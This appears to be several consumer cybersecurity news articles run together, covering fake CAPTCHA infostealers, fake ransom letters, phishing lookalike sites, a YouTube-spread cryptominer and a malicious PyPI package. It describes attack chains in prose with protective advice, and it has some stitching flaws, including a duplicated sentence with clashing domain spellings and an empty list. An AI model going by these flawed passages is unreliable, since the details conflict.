Cybercriminals have found a new way to trick Windows users into downloading harmful software by disguising malware as a CAPTCHA test. A recent investigation by security researchers revealed that attackers are using this method to install infostealer malware, which secretly collects sensitive data from infected computers.
How the Scam Works
The attack begins when a user visits a compromised website and encounters what appears to be a routine CAPTCHA verification. These tests are usually used to confirm that a visitor is human, but in this case, clicking on it unknowingly triggers a harmful command.
Instead of simply verifying the user’s identity, this fake CAPTCHA executes a hidden script that launches a multi-step infection process. The malware then installs itself and starts collecting sensitive information like usernames, passwords, and banking details.
Step-by-Step Breakdown of the Attack
1. Fake CAPTCHA Displayed: The user sees what looks like a normal CAPTCHA test.
2. PowerShell Command Executed: Clicking on the CAPTCHA activates a hidden script that runs harmful commands.
3. Additional Malicious Code Downloaded: The script retrieves more files, which help the malware spread without detection.
4. Final Infection: The malware, such as Lumma or Vidar, is installed and begins stealing personal data.
How Attackers Evade Detection
Hackers use several techniques to keep their malware hidden from security software:
Obfuscation: The malware code is made more complex to avoid being detected by antivirus programs.
Multiple Layers of Encryption: Attackers scramble the malware’s code so that security tools cannot recognize it.
Bypassing Security Measures: The script manipulates Windows settings to prevent detection and removal.
In some cases, the malware uses a special trick called XOR encryption to disguise itself. Some versions even include commands that trick Windows security tools into believing the malware is safe.
How to Protect Yourself
To avoid falling victim to this scam, follow these precautions:
1. Be Wary of Suspicious CAPTCHAs: If a CAPTCHA test appears unusual or asks for unexpected actions, do not interact with it.
2. Stay on Trusted Websites: Avoid unknown or unverified sites, as they may be compromised.
3. Keep Your System Updated: Install the latest security updates for Windows and your antivirus software.
4. Use Reliable Security Tools: A strong antivirus program can help detect and block suspicious activity.
5. Enable Browser Protections: Modern web browsers offer security features that warn against unsafe websites — keep them turned on.
This deceptive CAPTCHA scam is a reminder that cybercriminals are always coming up with new ways to infect devices and steal personal data. By staying alert and following basic security practices, users can reduce their chances of being targeted by such attacks.
A new scam is targeting top business leaders in the United States, where criminals are sending letters demanding large ransom payments. Unlike typical ransomware attacks that involve hacking into computer systems, this scheme relies on physical mail. The letters claim that hackers have stolen company data and will leak it unless a ransom of $250,000 to $500,000 is paid. However, cybersecurity experts believe this is a fraud, with no actual hacking involved.
How the Scam Works
Investigators from the GuidePoint Research and Intelligence Team (GRIT) discovered that several companies have received these ransom letters through the US Postal Service (USPS). The letters are addressed to high-level executives and claim to be from the BianLian ransomware group, a known cybercriminal organization.
The message states that the company's confidential information has been stolen and will be exposed unless the demanded payment is made within ten days. To make the threat appear real, the letter includes a Bitcoin wallet address and a QR code that links directly to it. Some letters also provide links to BianLian’s dark web site to add legitimacy to the claim.
Despite these details, security analysts have found no proof that any actual data theft has occurred. The scam relies on fear and deception, hoping that executives will panic and send money.
Why Experts Believe the Threat Is Fake
Cybersecurity specialists have carefully examined multiple cases of this scam and found no signs of hacking or data breaches. The companies targeted in this scheme have not reported any unusual activity or unauthorized access to their systems. This strongly suggests that the criminals behind the letters are only pretending to be the BianLian ransomware group.
The FBI has confirmed that these letters are part of a fraud campaign and do not represent a real cyberattack. Many of the envelopes are marked as "Time Sensitive" to create urgency, and some even list a return address in Boston, Massachusetts, which appears to be another false detail.
Since there is no actual ransomware attack, businesses do not need to take technical action like removing malware or restoring stolen files. The main risk comes from executives believing the scam and paying the ransom.
What to Do If You Receive One of These Letters
If your company receives a similar ransom demand, take the following precautions:
1. Check Your Systems for Security Issues – Ensure that company networks are protected and that there are no signs of hacking or data leaks. Keeping cybersecurity measures updated is always important.
2. Do Not Send Any Money – These threats are fake, and paying the ransom will only encourage further scams.
3. Report the Scam – Contact law enforcement and inform the nearest FBI field office about the letter. Complaints can also be filed with the Internet Crime Complaint Center (IC3).
4. Inform Key Personnel – Let executives and employees know about this scam so they can recognize and ignore similar fraud attempts in the future.
This scam is a reminder that cybercriminals do not always rely on advanced hacking techniques. Sometimes, they use old-fashioned methods like physical mail to create fear and manipulate victims into paying. While real ransomware attacks remain a serious concern, this particular scheme is based on false claims.
Companies should stay informed and take precautions to avoid falling victim to these types of fraud. Being aware of such scams is the best way to protect against them.
Recent research from the cybersecurity company NordVPN has revealed a significant rise in online threats, with over 669 million malware attacks recorded in the UK in 2024 alone. This alarming number highlights the increasing risk of falling victim to fake websites, harmful ads, and malicious software, especially when browsing popular websites or using free video streaming platforms.
Fake Websites Imitating Well-Known Brands
Cybercriminals often create websites that look almost identical to popular tech companies like Google, Facebook, and Microsoft. Their main goal is to trick people into providing their login details, which can then be misused for criminal activities.
NordVPN’s research shows that in 2024, over 85,000 fake web links were created to imitate Google's official platforms. Similarly, around 6,000 fake links were designed to look like Facebook, and nearly 5,000 were made to mimic Microsoft. Other major companies such as AT&T, Yahoo!, and Netflix were also targeted, with around 4,000 fake URLs created for each.
A common tactic used by scammers is slightly altering the spelling of well-known brand names, hoping that people won't notice the difference. For example, they may change "Google" to "G00gle" or "Amazon" to "Arnazon." This simple trick often convinces users to enter their login details, unknowingly handing their information over to cybercriminals.
Although these major tech companies have no involvement in the fraud, their popularity makes them easy targets for impersonation. Because people generally trust these brands, they often do not realize they have been scammed until it’s too late.
Malware Hidden on Video Hosting Platforms
Another major source of cyber threats is free video streaming websites, where users often go to watch movies, shows, or anime. According to NordVPN’s findings, over 1.5 billion attempts to infect devices with malware were blocked on such sites in 2024 alone.
Websites related to entertainment, sports, and file-sharing are especially vulnerable. Malware infections on entertainment websites alone reached almost one billion, while sports sites recorded around 124 million attacks. Additionally, adult content sites and file-sharing platforms faced millions of malware infiltration attempts.
The risk doesn't stop at malware. Many of these websites are filled with intrusive advertisements and hidden web trackers designed to collect user data. These trackers monitor your online activity, gathering information about your browsing habits, interests, and personal details. While companies use this data to target you with advertisements, it can become dangerous if hackers gain access to it.
Understanding the Threats: Malware, Trackers, and Intrusive Ads
Malware, short for malicious software, refers to harmful programs like viruses, spyware, ransomware, and trojans. If malware infects your device, it can steal your sensitive information, lock your files, or even give hackers full control of your device. This often happens when users unknowingly download files from untrusted websites or click on suspicious links.
Trackers are small tools placed on websites to monitor your online behavior. Companies use this information for marketing purposes, but if the data is leaked, it can be misused by hackers for malicious purposes.
Intrusive advertisements, commonly seen on free video streaming sites, pose another risk. These ads not only disrupt your browsing experience but can also direct you to harmful websites or secretly install malware on your device without your consent.
Tips to Protect Yourself from Cyber Threats
Cybersecurity expert Adrianus Warmenhoven suggests some practical ways to protect yourself from online threats like malware, intrusive ads, and web trackers. Here’s how you can stay safe:
1. Avoid Free or Suspicious Websites
Websites offering free video hosting, downloads, or pirated content often hide harmful software. Avoid visiting such sites, as they are more likely to infect your device with malware.
2. Be Careful with Unknown Emails and Messages
Cybercriminals often use emails or messages that promise big rewards or urgent updates to trick you into giving away personal information. Avoid clicking on links in emails that sound too good to be true or ask for your data.
3. Always Verify Links Before Clicking
Scammers often create fake links that look similar to popular websites. For example, a fake website might spell "Amazon" as "Arnazon" to confuse you. Always double-check the spelling of website links before clicking on them.
4. Check Files Before Downloading
Malware can often be hidden in files disguised as legitimate downloads. To avoid downloading harmful files, always use reliable websites and scan files with antivirus software before opening them.
5. Protect Your Personal Information
Limit the amount of personal information you share online, especially on social media. Cybercriminals can misuse details like your full name, location, or contact information for scams or identity theft.
6. Keep Your Devices Updated
Outdated software can make your device vulnerable to malware and other cyber threats. Regularly update your operating system, apps, and security software to patch any security flaws.
By following these steps, you can reduce the risk of falling victim to online threats and ensure your personal information remains safe.
Hackers are spreading SilentCryptominer malware hidden as genuine software. It has impacted over 2000 victims in Russia alone. The attack vector involves tricking YouTubers with a large follower base into spreading malicious links.
“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Secure List. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection.
Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency.” Few commonly found malware in the distribution scheme are: Phemedrone, DCRat NJRat, and XWorm.
In one incident, a YouTuber with 60k subscribers had put videos containing malicious links to infected archives, gaining over 400k views. The malicious links were hosted on gitrock[.]com, along with download counter crossing 40,000.
The malicious files were hosted on gitrok[.]com, with the download counter exceeding 40,000.
Threat actors have started using a new distribution plan where they send copyright strikes to content creators and influencers and blackmail them to shut down channels if they do not post videos containing malicious links. The scare strategy misuses the fame of the popular YouTubers to distribute malware to a larger base.
The infection chain starts with a manipulated start script that employs an additional executable file via PowerShell.
As per the Secure List Report, the loader (written in Python) is deployed with PyInstaller and gets the next-stage payload from hardcoded domains. The second-stage loader runs environment checks, adds “AppData directory to Microsoft Defender exclusions” and downloads the final payload “SilentCryptominer.”
The SilentCryptoMiner is known for mining multiple cryptocurrencies via different algorithms. It uses process hollowing techniques to deploy miner code into PCs for stealth.
The malware can escape security checks, like stopping mining when processes are running and scanning for virtual environment indicators.
Masked as a simple utility tool for Python sets, the package imitates commonly used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads). The trap baits innocent developers into installing the malicious package, allowing hackers unauthorized entry to Ethereum wallets.
Since the start of this year, set-utils has been downloaded over 1000 times, exposing Ethereum users and developers to risk. The package attacks people working with blockchain technology, especially developers using Python-based wallet management libraries like eth-account.
The package hacks Ethereum account creation to steal private keys through the blockchain by exploiting https://rpc-amoy.polygon.technology/ as a Command and Control server (C2). This lets hackers retrieve stolen credentials covertly.
PyPi targets Ethereum developers and businesses working with Python-based blockchain apps. These include:
For mitigating risk, businesses and developers should implement robust measures to protect software supply chains. Routine dependency audits and using automated scanning software can help detect malicious or suspicious behaviours in third-party packages when they are incorporated into production environments.
According to Socket, “Integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks.” Socket has notified the PyPI team, and “it was promptly removed to prevent further attacks.”